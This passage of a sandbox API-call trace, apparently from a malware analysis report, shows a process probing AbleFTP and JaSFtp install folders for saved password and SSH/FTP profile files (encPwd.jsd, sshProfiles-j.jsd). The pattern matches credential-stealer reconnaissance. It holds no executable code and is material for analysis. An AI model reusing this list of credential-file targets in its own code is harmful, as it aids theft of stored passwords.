arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0182.922] GetProcessHeap () returned 0x840000 [0182.922] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.922] GetProcessHeap () returned 0x840000 [0182.922] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.923] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.923] GetProcessHeap () returned 0x840000 [0182.923] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.923] GetProcessHeap () returned 0x840000 [0182.924] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x874280 [0182.924] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.925] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0182.925] GetProcessHeap () returned 0x840000 [0182.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0182.925] GetProcessHeap () returned 0x840000 [0182.925] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.926] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0182.927] GetProcessHeap () returned 0x840000 [0182.927] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.927] GetProcessHeap () returned 0x840000 [0182.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.928] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.929] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0182.929] GetProcessHeap () returned 0x840000 [0182.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.929] GetProcessHeap () returned 0x840000 [0182.929] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.930] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.930] GetProcessHeap () returned 0x840000 [0182.930] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.930] GetProcessHeap () returned 0x840000 [0182.930] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.931] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.932] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0182.932] GetProcessHeap () returned 0x840000 [0182.932] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.932] GetProcessHeap () returned 0x840000 [0182.932] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.934] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.934] GetProcessHeap () returned 0x840000 [0182.934] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.934] GetProcessHeap () returned 0x840000 [0182.934] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x874280 [0182.935] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.936] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0182.936] GetProcessHeap () returned 0x840000 [0182.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0182.936] GetProcessHeap () returned 0x840000 [0182.936] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.937] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0182.937] GetProcessHeap () returned 0x840000 [0182.937] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.938] GetProcessHeap () returned 0x840000 [0182.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.938] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.939] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0182.939] GetProcessHeap () returned 0x840000 [0182.939] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.939] GetProcessHeap () returned 0x840000 [0182.939] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.941] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.941] GetProcessHeap () returned 0x840000 [0182.941] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.941] GetProcessHeap () returned 0x840000 [0182.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.942] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.943] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0182.943] GetProcessHeap () returned 0x840000 [0182.943] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x871d38 [0182.943] GetProcessHeap () returned 0x840000 [0182.943] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.962] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.962] GetProcessHeap () returned 0x840000 [0182.963] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.963] GetProcessHeap () returned 0x840000 [0182.963] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x874280 [0182.963] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.964] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0182.965] GetProcessHeap () returned 0x840000 [0182.965] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0182.965] GetProcessHeap () returned 0x840000 [0182.965] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.965] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.966] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0182.966] GetProcessHeap () returned 0x840000 [0182.966] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.966] GetProcessHeap () returned 0x840000 [0182.966] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.967] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.968] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0182.968] GetProcessHeap () returned 0x840000 [0182.968] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.968] GetProcessHeap () returned 0x840000 [0182.968] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.973] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.973] GetProcessHeap () returned 0x840000 [0182.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.973] GetProcessHeap () returned 0x840000 [0182.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x874280 [0182.974] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.975] wvsprintfW (in: param_1=0x874280, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0182.975] GetProcessHeap () returned 0x840000 [0182.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.975] GetProcessHeap () returned 0x840000 [0182.975] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874280 | out: hHeap=0x840000) returned 1 [0182.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.976] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.977] GetProcessHeap () returned 0x840000 [0182.977] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.977] GetProcessHeap () returned 0x840000 [0182.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0182.978] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.978] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0182.979] GetProcessHeap () returned 0x840000 [0182.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0182.979] GetProcessHeap () returned 0x840000 [0182.979] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.980] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 0 [0182.980] GetProcessHeap () returned 0x840000 [0182.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.980] GetProcessHeap () returned 0x840000 [0182.980] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0182.981] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.982] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 64 [0182.982] GetProcessHeap () returned 0x840000 [0182.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.982] GetProcessHeap () returned 0x840000 [0182.983] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.984] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.984] GetProcessHeap () returned 0x840000 [0182.984] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.984] GetProcessHeap () returned 0x840000 [0182.984] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0182.985] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.986] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0182.986] GetProcessHeap () returned 0x840000 [0182.986] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.986] GetProcessHeap () returned 0x840000 [0182.986] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.987] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.987] GetProcessHeap () returned 0x840000 [0182.987] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.987] GetProcessHeap () returned 0x840000 [0182.987] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0182.988] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.989] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 43 [0182.989] GetProcessHeap () returned 0x840000 [0182.989] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0182.989] GetProcessHeap () returned 0x840000 [0182.989] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.990] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\encPwd.jsd") returned 0 [0182.991] GetProcessHeap () returned 0x840000 [0182.991] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.991] GetProcessHeap () returned 0x840000 [0182.991] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0182.992] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.993] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 64 [0182.993] GetProcessHeap () returned 0x840000 [0182.993] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.993] GetProcessHeap () returned 0x840000 [0182.993] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.995] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0182.995] GetProcessHeap () returned 0x840000 [0182.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.995] GetProcessHeap () returned 0x840000 [0182.995] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0182.996] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0182.997] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0182.997] GetProcessHeap () returned 0x840000 [0182.997] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0182.997] GetProcessHeap () returned 0x840000 [0182.997] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0182.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0182.998] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0182.998] GetProcessHeap () returned 0x840000 [0182.998] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0182.998] GetProcessHeap () returned 0x840000 [0182.998] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0182.999] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.000] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 43 [0183.000] GetProcessHeap () returned 0x840000 [0183.000] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0183.000] GetProcessHeap () returned 0x840000 [0183.001] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.012] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\encPwd.jsd") returned 0 [0183.012] GetProcessHeap () returned 0x840000 [0183.012] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.013] GetProcessHeap () returned 0x840000 [0183.013] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.014] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.015] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 64 [0183.015] GetProcessHeap () returned 0x840000 [0183.015] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0183.015] GetProcessHeap () returned 0x840000 [0183.015] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.016] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.016] GetProcessHeap () returned 0x840000 [0183.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.016] GetProcessHeap () returned 0x840000 [0183.016] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.017] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.018] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0183.018] GetProcessHeap () returned 0x840000 [0183.018] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0183.018] GetProcessHeap () returned 0x840000 [0183.018] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.019] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.020] GetProcessHeap () returned 0x840000 [0183.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.020] GetProcessHeap () returned 0x840000 [0183.020] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.020] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.021] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 43 [0183.021] GetProcessHeap () returned 0x840000 [0183.022] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5a) returned 0x871d38 [0183.022] GetProcessHeap () returned 0x840000 [0183.022] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.023] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\encPwd.jsd") returned 0 [0183.024] GetProcessHeap () returned 0x840000 [0183.024] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.024] GetProcessHeap () returned 0x840000 [0183.024] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.025] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.026] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 64 [0183.026] GetProcessHeap () returned 0x840000 [0183.026] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0183.026] GetProcessHeap () returned 0x840000 [0183.026] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.027] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.027] GetProcessHeap () returned 0x840000 [0183.027] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.027] GetProcessHeap () returned 0x840000 [0183.027] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.028] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.029] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0183.029] GetProcessHeap () returned 0x840000 [0183.029] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x871d38 [0183.029] GetProcessHeap () returned 0x840000 [0183.029] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.030] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.031] GetProcessHeap () returned 0x840000 [0183.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.031] GetProcessHeap () returned 0x840000 [0183.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.031] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.032] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 41 [0183.032] GetProcessHeap () returned 0x840000 [0183.032] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x56) returned 0x871d38 [0183.032] GetProcessHeap () returned 0x840000 [0183.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.033] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\encPwd.jsd") returned 0 [0183.034] GetProcessHeap () returned 0x840000 [0183.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.034] GetProcessHeap () returned 0x840000 [0183.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.035] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.036] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 62 [0183.036] GetProcessHeap () returned 0x840000 [0183.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.036] GetProcessHeap () returned 0x840000 [0183.036] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.037] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.037] GetProcessHeap () returned 0x840000 [0183.037] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.038] GetProcessHeap () returned 0x840000 [0183.038] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.038] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.039] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 62 [0183.039] GetProcessHeap () returned 0x840000 [0183.039] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.039] GetProcessHeap () returned 0x840000 [0183.039] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.041] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.041] GetProcessHeap () returned 0x840000 [0183.041] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.041] GetProcessHeap () returned 0x840000 [0183.041] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.042] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.043] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 41 [0183.043] GetProcessHeap () returned 0x840000 [0183.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x56) returned 0x871d38 [0183.043] GetProcessHeap () returned 0x840000 [0183.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.044] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp8\\encPwd.jsd") returned 0 [0183.044] GetProcessHeap () returned 0x840000 [0183.044] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.044] GetProcessHeap () returned 0x840000 [0183.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 